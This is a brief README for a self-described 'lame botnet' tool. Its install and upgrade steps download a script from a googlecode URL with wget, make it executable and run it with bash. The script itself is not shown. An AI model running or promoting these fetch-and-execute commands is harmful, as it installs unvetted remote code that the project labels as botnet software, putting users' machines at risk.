#lame botnet -- 3.2 # # README # ### Install #For first time use, issue the following commands: wget -t0 -O ~/lamebot http://lamebotnet.googlecode.com/svn/trunk/lamebot chmod 755 ~/lamebot bash ~/lamebot install ### Upgrade #Issue the following commands: wget -t0 -O ~/lamebot http://lamebotnet.googlecode.com/svn/trunk/lamebot bash ~/lamebot upgrade #Note: This will update the script first; then upgrade the bot #EOF